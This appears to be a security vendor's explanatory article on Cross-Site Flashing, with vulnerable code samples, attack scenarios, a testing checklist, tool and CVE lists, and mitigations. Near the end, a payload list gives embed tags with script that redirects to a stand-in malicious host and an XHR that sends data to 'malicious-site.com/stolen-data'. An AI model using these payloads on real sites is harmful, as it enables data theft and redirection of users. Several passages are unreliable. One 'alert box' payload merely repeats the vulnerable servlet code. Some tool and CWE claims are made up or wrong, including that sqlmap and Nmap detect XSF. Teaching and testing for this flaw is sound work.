20 Feb, 2023

Cross-Site Flashing

Vulnerability Assessment as a Service (VAaaS)

Tests systems and applications for vulnerabilities to address weaknesses.

Cross-Site Flashing (XSF) is a type of web application vulnerability that can allow an attacker to inject malicious Adobe Flash files (SWF files) into a legitimate website, which can then be executed by unsuspecting users who visit the compromised site. XSF can occur when a website fails to properly validate user input or to sanitize data that is used in Flash object parameters, allowing an attacker to inject their own Flash content into a vulnerable website.

Example of vulnerable code on different programming languages:


in PHP:

				
					$param = $_GET['param'];
echo "<embed src='myflash.swf?param=".$param."' />";

				
			


In this code, the script takes an input parameter ‘param’ from the URL query string and directly embeds it into the Flash object source attribute. If the attacker is able to inject malicious Flash code into the ‘param’ parameter, it will be executed on the client-side, leading to a potential XSF attack.

• in ASP.NET:

				
					string param = Request.QueryString["param"];
Response.Write("<embed src='myflash.swf?param=" + param + "' />");

				
			


Similar to the PHP code, this ASP.NET script takes an input parameter ‘param’ from the URL query string and directly embeds it into the Flash object source attribute. An attacker could exploit this vulnerability by injecting malicious Flash code into the ‘param’ parameter, leading to a potential XSF attack.

• in Java Servlets:

				
					String param = request.getParameter("param");
response.getWriter().println("<embed src='myflash.swf?param=" + param + "' />");

				
			


In this Java Servlet code, the script takes an input parameter ‘param’ from the HTTP request and directly embeds it into the Flash object source attribute. An attacker could exploit this vulnerability by injecting malicious Flash code into the ‘param’ parameter, leading to a potential XSF attack.

Examples of exploitation Cross-Site Flashing

Stealing sensitive information:

An attacker could inject malicious Flash content into a legitimate website, which then steals sensitive information from the unsuspecting users who visit the compromised site. For example, the attacker could create a fake login form within the malicious Flash content, which prompts the user to enter their login credentials. These credentials would then be sent to the attacker’s server, giving them access to the victim’s account.

Spreading malware:

The attacker could inject a Flash file with malware that automatically downloads and installs on the victim’s computer when they visit the compromised website. The malware could perform various malicious activities such as logging keystrokes, capturing screenshots, stealing personal information, or even turning the victim’s computer into a botnet.

Defacing the website:

An attacker could inject a Flash file that alters the appearance of the website or displays offensive content. This could damage the reputation of the website and cause loss of business.

Redirecting to malicious sites:

The attacker could inject a Flash file that redirects the victim to a malicious website, which could further exploit the user’s system with other types of attacks, such as phishing or drive-by download attacks.

Privilege escalation techniques for Cross-Site Flashing

Exploiting vulnerabilities in the victim’s web browser:

Once the attacker has injected malicious Flash content into the victim’s system, they may try to exploit vulnerabilities in the victim’s web browser to gain further access. This could include exploiting known vulnerabilities or using zero-day exploits to bypass security mechanisms and gain elevated privileges.

Using the Flash plugin to run arbitrary code:

Since the Adobe Flash plugin has broad access to the victim’s system, an attacker may use the Flash file to execute arbitrary code on the victim’s machine. This could include downloading and running additional malware or performing other types of attacks to escalate their privileges.

Leveraging other types of vulnerabilities:

An attacker may use XSF in conjunction with other types of vulnerabilities to escalate their privileges. For example, the attacker could use XSF to inject malicious code into a website and then use a separate vulnerability to gain root-level access to the victim’s system.

Social engineering attacks:

An attacker may use social engineering techniques to trick the victim into running the malicious Flash file with elevated privileges. This could involve convincing the user to disable security mechanisms or to run the Flash file with administrator privileges.

General methodology and checklist for Cross-Site Flashing

Methodology:

  1. Identify areas of the website that use Flash: Identify all the areas of the website where Flash is used, including areas that allow user input or file uploads.

  2. Use a proxy tool to capture HTTP traffic: Use a proxy tool such as Burp Suite to capture and analyze HTTP traffic between the web server and the web browser. This will help identify requests and responses that contain Flash files.

  3. Modify the parameters of the Flash file: Modify the parameters of the Flash file and observe the behavior of the website. This will help identify whether the Flash file is vulnerable to XSF attacks.

  4. Test for known XSF vulnerabilities: Test for known XSF vulnerabilities in the Flash file, such as the ability to pass parameters to the Flash file that allow for cross-site scripting attacks.

  5. Test for privilege escalation: Test for privilege escalation by trying to exploit any known vulnerabilities in the Flash plugin or other parts of the system. This could include attempting to download and execute arbitrary code, gain access to sensitive information, or take control of the victim’s system.

  6. Document and report any vulnerabilities: Document any vulnerabilities that are discovered and report them to the website owner or the appropriate authorities. Include a detailed explanation of the vulnerability, the potential impact, and steps for remediation.

  7. Retest after fixes are applied: Retest the website after any fixes are applied to ensure that the vulnerabilities have been properly addressed and that the website is no longer vulnerable to XSF attacks.

Checklist:

  1. Identify all areas of the website where Flash is used, including areas that allow user input or file uploads.

  2. Check for Flash-based advertisements, widgets, or other third-party content that may be embedded in the website.

  3. Use a proxy tool such as Burp Suite to capture and analyze HTTP traffic between the web server and the web browser.

  4. Check for the presence of any user-controllable parameters in the Flash file.

  5. Modify the parameters of the Flash file and observe the behavior of the website.

  6. Check for the ability to pass parameters to the Flash file that allow for cross-site scripting attacks.

  7. Test for known XSF vulnerabilities in the Flash file or other components of the system.

  8. Check for the ability to download and execute arbitrary code using the Flash file.

  9. Test for privilege escalation by attempting to gain access to sensitive information or control of the victim’s system.

  10. Document any vulnerabilities that are discovered and report them to the website owner or the appropriate authorities.

  11. Retest the website after any fixes are applied to ensure that the vulnerabilities have been properly addressed and that the website is no longer vulnerable to XSF attacks.

Tools set for exploiting Cross-Site Flashing

Manual Tools:

  • Adobe Flash Debugger – a standalone tool for analyzing and debugging Flash files, which can be used to identify XSF vulnerabilities in a Flash file.

  • SWFScan – a tool for scanning SWF files for vulnerabilities, including XSF attacks. It can also detect other types of vulnerabilities, such as cross-site scripting and SQL injection.

  • SWF Decompiler – a tool for decompiling and analyzing SWF files, which can be used to identify XSF vulnerabilities in the Flash file. It can also be used to modify the Flash file and test for privilege escalation.

  • Wireshark – a network analysis tool that can be used to capture and analyze network traffic between the web server and the web browser, which can help identify XSF attacks.

  • Firebug – a web development tool that can be used to inspect and modify the parameters of Flash files, which can help identify and exploit XSF vulnerabilities.

Automated Tools:

  • Acunetix – a web application scanner that can be used to identify XSF vulnerabilities in a website. It can also detect other types of vulnerabilities, such as cross-site scripting and SQL injection.

  • AppSpider – a web application scanner that can be used to identify XSF vulnerabilities in a website. It can also detect other types of vulnerabilities, such as cross-site scripting and SQL injection.

  • Burp Suite – a web application testing tool that includes a proxy server, which can be used to capture and analyze HTTP traffic between the web server and the web browser. It can also be used to test for XSF vulnerabilities and privilege escalation.

  • ZAP – an open-source web application scanner that can be used to identify XSF vulnerabilities in a website. It can also detect other types of vulnerabilities, such as cross-site scripting and SQL injection.

  • Netsparker – a web application scanner that can be used to identify XSF vulnerabilities in a website. It can also detect other types of vulnerabilities, such as cross-site scripting and SQL injection.

  • Nmap – a network mapping tool that can be used to identify open ports and services on a target system, which can help identify XSF vulnerabilities.

  • sqlmap – a tool for detecting and exploiting SQL injection vulnerabilities in a website, which can be used to identify and exploit XSF vulnerabilities.

  • Metasploit – a penetration testing tool that includes a wide range of exploits and payloads, which can be used to test for XSF vulnerabilities and privilege escalation.

  • Grendel-Scan – an open-source web application scanner that can be used to identify XSF vulnerabilities in a website. It can also detect other types of vulnerabilities, such as cross-site scripting and SQL injection.

  • Vega – an open-source web application scanner that can be used to identify XSF vulnerabilities in a website. It can also detect other types of vulnerabilities, such as cross-site scripting and SQL injection.

Browser Plugins:

  • Flashblock – a browser plugin that blocks all Flash content by default, which can help protect against XSF attacks.

  • NoScript – a browser plugin that blocks all JavaScript by default, which can help protect against XSF attacks that rely on JavaScript.

  • Ghostery – a browser plugin that blocks third-party tracking scripts, including Flash-based tracking, which can help protect against XSF attacks.

  • uBlock Origin – a browser plugin that blocks ads and other unwanted content, including Flash-based ads, which can help protect against XSF attacks.

  • ScriptSafe – a browser plugin that blocks scripts and other active content, including Flash-based content, which can help protect against XSF attacks.

Average CVSS score of stack Cross-Site Flashing

The Common Vulnerability Scoring System (CVSS) provides a way to evaluate the severity of security vulnerabilities. The CVSS score is a numeric value ranging from 0 to 10, where 10 represents the most severe vulnerabilities.

The CVSS score of Cross-Site Flashing (XSF) vulnerabilities can vary depending on the specific vulnerability and its impact. In general, XSF vulnerabilities can have a high impact on web application security, as they can be used to steal sensitive information, compromise user accounts, or take over the entire web application.

The CVSS score of XSF vulnerabilities typically falls in the range of 5 to 9, with some vulnerabilities scoring higher or lower than that. However, it’s worth noting that the CVSS score is just one factor to consider when evaluating the severity of a vulnerability. Other factors, such as the likelihood of the vulnerability being exploited, the potential impact on the system or application, and the ease of exploitation, should also be taken into account.

The Common Weakness Enumeration (CWE)

CWE-79: Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) – XSF can be used in combination with cross-site scripting (XSS) to inject malicious code into web pages.

CWE-352: Cross-Site Request Forgery (CSRF) – XSF can be used to trick users into executing CSRF attacks, which can lead to unauthorized actions on the website.

CWE-434: Unrestricted Upload of File with Dangerous Type – XSF can be used to bypass file type validation and upload malicious files, such as Flash files, to the web server.

CWE-539: Use of Persistent Cookies Containing Sensitive Information – XSF can be used to steal sensitive information stored in persistent cookies, such as session IDs.

CWE-565: Reliance on Cookies without Validation and Integrity Checking – XSF can be used to modify or delete cookies, which can lead to session hijacking or other attacks.

CWE-613: Insufficient Session Expiration – XSF can be used to extend the lifetime of a user’s session, allowing attackers to maintain access to the user’s account.

CWE-807: Reliance on Untrusted Inputs in a Security Decision – XSF can be used to manipulate security decisions made by the web application, such as access control or authorization checks.

CWE-815: Failure to Sanitize Special Elements into a Different Plane (Special Element Injection) – XSF can be used to inject special characters, such as HTML tags or XML entities, into web pages, leading to special element injection attacks.

CWE-918: Server-Side Request Forgery (SSRF) – XSF can be used to execute SSRF attacks, which can allow attackers to access internal resources and systems.

CWE-933: Improper Control of Filename for Include/Require Statement in PHP Program (‘PHP File Inclusion’) – XSF can be used to bypass file inclusion protection in PHP applications and execute arbitrary code.

CVES related to Cross-Site Flashing

CVE-2017-8406 – An issue was discovered on D-Link DCS-1130 devices. The device provides a crossdomain.xml file with no restrictions on who can access the webserver. This allows an hosted flash file on any domain to make calls to the device’s webserver and pull any information that is stored on the device. In this case, user’s credentials are stored in clear text on the device and can be pulled easily. It also seems that the device does not implement any cross-site scripting forgery protection mechanism which allows an attacker to trick a user who is logged in to the web management interface into executing a cross-site flashing attack on the user’s browser and execute any action on the device provided by the web management interface which steals the credentials from tools_admin.cgi file’s response and displays it inside a Textfield.

CVE-2015-8760 – The Flvplayer component in TYPO3 6.2.x before 6.2.16 allows remote attackers to embed Flash videos from external domains via unspecified vectors, aka “Cross-Site Flashing.”

Cross-Site Flashing exploits

BeEF (Browser Exploitation Framework) – BeEF is a tool that uses XSF to exploit vulnerable web browsers and execute commands on the victim’s computer.

SWF Injection – SWF Injection is a technique that uses XSF to inject malicious Flash files into web pages, which can be used to steal sensitive information or take over the user’s computer.

XSS+Flash – XSS+Flash is an attack that combines XSF with cross-site scripting (XSS) to execute malicious Flash code in a victim’s web browser.

Clickjacking with Flash – Clickjacking with Flash is an attack that uses XSF to place a transparent Flash object over a web page, tricking users into clicking on hidden buttons or links.

CSRF with Flash – CSRF with Flash is an attack that uses XSF to execute Cross-Site Request Forgery (CSRF) attacks, allowing an attacker to perform unauthorized actions on a victim’s behalf.

Flash-Based Redirection – Flash-Based Redirection is an attack that uses XSF to redirect a victim’s web browser to a malicious website or exploit kit.

Flash Parameter Injection – Flash Parameter Injection is an attack that uses XSF to manipulate Flash file parameters, which can be used to exploit vulnerabilities in the Flash player and execute arbitrary code.

Cookie Injection – Cookie Injection is an attack that uses XSF to inject a malicious Flash file into a user’s browser, which can be used to steal sensitive information from cookies, such as session IDs.

SWF Upload Vulnerabilities – SWF Upload Vulnerabilities are XSF vulnerabilities that allow attackers to upload malicious Flash files to a web server and execute arbitrary code.

Flash-Based Cross-Domain Scripting – Flash-Based Cross-Domain Scripting is an attack that uses XSF to execute scripts across different domains, which can be used to steal sensitive information or perform unauthorized actions on other websites.

Practicing in test for Cross-Site Flashing

Use vulnerable web applications – Look for web applications that are known to be vulnerable to XSF and use them to practice identifying and exploiting XSF vulnerabilities. You can find vulnerable applications on websites like OWASP or VulnHub.

Set up your own test environment – You can set up a test environment with a web server and vulnerable web applications to practice testing for XSF. You can use tools like DVWA (Damn Vulnerable Web Application) or Mutillidae to create a vulnerable environment.

Use automated tools – There are several automated tools available that can help you identify XSF vulnerabilities in web applications. Tools like Burp Suite, OWASP ZAP, and Acunetix can help you identify XSF vulnerabilities quickly and easily.

Practice manual testing – Manual testing involves inspecting the source code of web applications and manually identifying XSF vulnerabilities. You can use tools like Fiddler or Wireshark to intercept HTTP requests and responses, and inspect the code for XSF vulnerabilities.

Participate in CTF events – Capture the Flag (CTF) events often include challenges related to XSF and other web application vulnerabilities. Participating in these events can help you practice identifying and exploiting XSF vulnerabilities in a competitive environment.

Attend training courses – There are several training courses available that can teach you how to test for XSF and other web application vulnerabilities. You can attend courses offered by organizations like SANS or Offensive Security to learn more about XSF testing.

For study Cross-Site Flashing

OWASP

The Open Web Application Security Project (OWASP) is a non-profit organization that provides resources and tools to help organizations improve the security of their web applications. Their website includes a dedicated page on XSF, which provides an overview of the vulnerability and some techniques for testing for it.

SANS 

SANS is a training and certification organization that offers several courses related to web application security, including courses on XSF. These courses are designed for both beginners and experienced professionals, and cover topics like XSF testing techniques, exploitation, and mitigation.

Web Application Hacker’s Handbook 

The Web Application Hacker’s Handbook is a popular book that covers a wide range of web application vulnerabilities, including XSF. The book provides an in-depth look at XSF, including how the vulnerability works, common exploitation techniques, and mitigation strategies.

Burp Suite 

Burp Suite is a popular web application security testing tool that includes features for identifying XSF vulnerabilities. Burp Suite includes both automated and manual testing features for XSF, as well as tools for exploiting and mitigating the vulnerability.

YouTube

YouTube includes many videos related to XSF, including tutorials, walkthroughs, and demonstrations. Some popular channels that cover XSF and other web application security topics include Hackersploit, IppSec, and LiveOverflow.

Books with review of Cross-Site Flashing

The Web Application Hacker’s Handbook by Dafydd Stuttard and Marcus Pinto – This book covers a wide range of web application vulnerabilities, including XSF. The authors provide an in-depth look at XSF, including how the vulnerability works, common exploitation techniques, and mitigation strategies.

Web Application Security: A Beginner’s Guide by Bryan Sullivan and Vincent Liu – This book provides an introduction to web application security, including a section on XSF. The authors cover the basics of XSF, including how the vulnerability works and how to identify and exploit it.

Hacking Exposed Web Applications by Joel Scambray, Vincent Liu, and Caleb Sima – This book covers a wide range of web application vulnerabilities, including XSF. The authors provide an overview of XSF, including how the vulnerability works, common exploitation techniques, and mitigation strategies.

The Tangled Web: A Guide to Securing Modern Web Applications by Michal Zalewski – This book covers a wide range of web application vulnerabilities, including XSF. The author provides an in-depth look at XSF, including how the vulnerability works, common exploitation techniques, and mitigation strategies.

Mastering Modern Web Penetration Testing by Prakhar Prasad – This book provides an in-depth look at web application security, including a section on XSF. The author covers the basics of XSF, including how the vulnerability works and how to identify and exploit it.

Black Hat Python: Python Programming for Hackers and Pentesters by Justin Seitz – This book covers a wide range of hacking topics, including web application security and XSF. The author provides examples of XSF exploits using Python.

Python Web Penetration Testing Cookbook by Cameron Buchanan, Terry Ip, Andrew Mabbitt, and Benjamin May – This book provides an introduction to web application security testing using Python, including a section on XSF. The authors cover the basics of XSF, including how the vulnerability works and how to identify and exploit it.

The Basics of Hacking and Penetration Testing by Patrick Engebretson – This book provides an introduction to hacking and penetration testing, including a section on web application security and XSF. The author covers the basics of XSF, including how the vulnerability works and how to identify and exploit it.

Real-World Bug Hunting: A Field Guide to Web Hacking by Peter Yaworski – This book provides an introduction to web application security testing, including a section on XSF. The author covers the basics of XSF, including how the vulnerability works and how to identify and exploit it.

Web Application Security Testing with Burp Suite by Sunny Wear – This book provides an introduction to web application security testing using the popular tool, Burp Suite. The author covers the basics of XSF, including how the vulnerability works and how to identify and exploit it using Burp Suite.

List of payloads Cross-Site Flashing

A simple alert box that can be triggered by the injected Flash content.

				
					String param = request.getParameter("param");
response.getWriter().println("<embed src='myflash.swf?param=" + param + "' />");
				
			


An iframe that loads a malicious page within the vulnerable page.

				
					<embed src="https://example.com/malicious.swf" type="application/x-shockwave-flash" AllowScriptAccess="always" allowNetworking="all" width="1" height="1" FlashVars="param1=<iframe src='https://malicious-site.com/'></iframe>"/>
				
			

 

An image tag that is replaced with a malicious script.

				
					<embed src="https://example.com/malicious.swf" type="application/x-shockwave-flash" AllowScriptAccess="always" allowNetworking="all" width="1" height="1" FlashVars="param1=<img class="lazyload" src=x onerror=alert('XSF exploit!') />"/>
				
			

 

A redirect to a malicious page.

				
					<embed src="https://example.com/malicious.swf" type="application/x-shockwave-flash" AllowScriptAccess="always" allowNetworking="all" width="1" height="1" FlashVars="param1=<script>window.location='http://malicious-site.com/'</script>"/>
				
			

 

An XHR (XMLHttpRequest) request that steals sensitive information from the user.

				
					<embed src="https://example.com/malicious.swf" type="application/x-shockwave-flash" AllowScriptAccess="always" allowNetworking="all" width="1" height="1" FlashVars="param1=<script>var xhr = new XMLHttpRequest(); xhr.open('GET', 'http://malicious-site.com/stolen-data', true); xhr.send();</script>"/>
				
			

How to be protected from Cross-Site Flashing

  1. Keep your web browser and Flash player up to date with the latest security patches.

  2. Use a browser that has built-in protections against XSF attacks, such as Google Chrome or Mozilla Firefox.

  3. Install a browser extension that blocks Flash content, such as Flashblock.

  4. Disable the Flash plugin in your web browser unless it is absolutely necessary for a particular website or application.

  5. Use a content security policy (CSP) to restrict the types of content that can be loaded by your web pages.

  6. Implement proper input validation and output encoding in your web applications to prevent injection of malicious Flash content.

  7. Regularly scan your web applications for vulnerabilities using automated tools and/or manual testing.

  8. Train your employees and users to recognize and avoid social engineering attacks that may be used to exploit XSF vulnerabilities.

Mitigations for Cross-Site Flashing

  1. Implement proper input validation and output encoding in your web applications to prevent injection of malicious Flash content.

  2. Use a content security policy (CSP) to restrict the types of content that can be loaded by your web pages, including Flash content.

  3. Disable the Flash plugin in your web browser unless it is absolutely necessary for a particular website or application.

  4. Use a browser that has built-in protections against XSF attacks, such as Google Chrome or Mozilla Firefox.

  5. Install a browser extension that blocks Flash content, such as Flashblock.

  6. Keep your web browser and Flash player up to date with the latest security patches.

  7. Regularly scan your web applications for vulnerabilities using automated tools and/or manual testing.

  8. Train your employees and users to recognize and avoid social engineering attacks that may be used to exploit XSF vulnerabilities.

  9. Use a web application firewall (WAF) that can detect and block XSF attacks.

  10. Implement a secure software development lifecycle (SDLC) to minimize the risk of XSF vulnerabilities in your web applications.

Conclusion

Cross-Site Flashing (XSF) is a web application security vulnerability that can be used by attackers to inject and execute malicious Flash content on a victim’s web browser. XSF attacks can result in a range of consequences, from stealing sensitive data to taking control of the victim’s computer.

To protect against XSF attacks, web developers and website owners should implement input validation, output encoding, and content security policies in their web applications. Users can also take steps to protect themselves, such as keeping their web browsers and Flash players up to date, disabling the Flash plugin when it is not needed, and using a browser that has built-in protections against XSF attacks.

Overall, the key to preventing XSF attacks is to implement a comprehensive approach to web application security that includes secure coding practices, regular vulnerability assessments, and user education. By taking a proactive approach to security, organizations can reduce the risk of XSF attacks and protect against other types of web-based threats.

Other Services

Ready to secure?

Let's get in touch